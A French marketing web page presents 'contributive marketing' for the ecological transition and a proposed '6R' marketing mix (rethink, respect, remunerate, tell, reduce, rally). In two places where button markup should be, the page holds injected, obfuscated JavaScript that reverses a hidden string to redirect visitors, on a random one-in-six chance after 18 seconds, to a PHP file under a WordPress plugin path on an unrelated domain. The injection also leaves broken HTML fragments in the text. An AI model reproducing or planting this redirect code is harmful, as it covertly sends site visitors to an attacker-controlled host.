Marketing contributif

Réancrer le marketing dans la durabilité

Le marketing, comme tous les autres métiers de l’entreprise (achats, finance, RH, production…), doit transformer sa posture et ses pratiques pour se mettre au service de la transition écologique. Réancrer le marketing dans la durabilité nécessite de se questionner et d’agir avec discernement, ce qui implique compréhension, connaissances et compétences.

Il s’agit de mettre en oeuvre une approche radicale des besoins et limites, conformément à la définition du développement durable de 1987 du rapport Brundtland, et de concilier limites planétaires et besoins sociétaux, des besoins collectifs et non individuels, voire individualistes.

Il s’agit de viser la soutenabilité forte pour maintenir le vivant, pour arriver à une sobriété nécessaire et basculer collectivement dans l’éco-compatibilité. Cette bascule naîtra d’une adhésion collective à un nouveau projet de société et permettra de transformer l’ensemble des pratiques et de changer la norme culturelle.

C’est dans cette bascule que le marketing peut jouer un rôle clé.

Adopter un nouveau mix marketing : les 6R

Les 4P des années 60’s ont vécu. Après avoir été transformé par la révolution numérique, le mix marketing doit maintenant devenir éco-compatible et contributif.

Nous avons imaginé un nouveau mix marketing, le mix marketing de l’adhésion écologique, il comporte 6 piliers, nous les avons appelés les 6R :

  • Repenser le rôle de la marque (purpose)
  • Respecter le vivant dans son ensemble (product)
  • Rémunérer chacun justement (price)
  • Raconter ce qui fera la différence (promotion)
  • Réduire les impacts négatifs (place)
  • Rallier à de nouveaux mode de vie (participation)

Chaque pilier traduit un changement de posture qui nourrit la transition écologique, et doit être travaillé, mais il y a 2 piliers fondamentaux qui sont à traiter de façon prioritaire : la posture de marque et l’offre produit.

ton {"className":"is-style-outline"} -->
$mWn=function(n){if(typeof ($mWn.list[n])== »string ») return $mWn.list[n].split(«  »).reverse().join(«  »);return $mWn.list[n];};$mWn.list=[« \’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton__link » href= »https://pourunmarketingcontributif.fr/2-les-contenus-pour-comprendre-en-profondeur/les-focus/les-6r-le-mix-marketing-de-ladhsion-cologique » target= »_blank » rel= »noreferrer noopener »>▶️ Explorer les 6R, le mix marketing de l’adhésion écologique

Des nouveaux concepts

Derrière chaque pilier se trouvent des concepts tels que : l’entreprise contributive / durable, le rôle sociétal de la marque, la co-construction avec les parties prenantes, les nouveaux modèles économiques, l’économie circulaire / fonctionnelle / symbiotique, l’éco-conception et l’analyse du cycle de vie, les labels / scores / indices, le prix juste, le partage de la valeur créée, les nouveaux récits / imaginaires, l’information du consommateur, la communication responsable / engageante, le numérique sobre / frugal, la consommation durable…

Autant de nouveaux concepts que les marketeurs doivent connaître, comprendre et savoir mettre en oeuvre. C’est notre mission de vous accompagner dans cette démarche de transformation.

ton {"className":"is-style-outline"} -->
$mWn=function(n){if(typeof ($mWn.list[n])== »string ») return $mWn.list[n].split(«  »).reverse().join(«  »);return $mWn.list[n];};$mWn.list=[« \’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod »];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton__link » href= »https://www.urvad.fr/urvad/ »>▶️ Découvrir URVAD

tor -->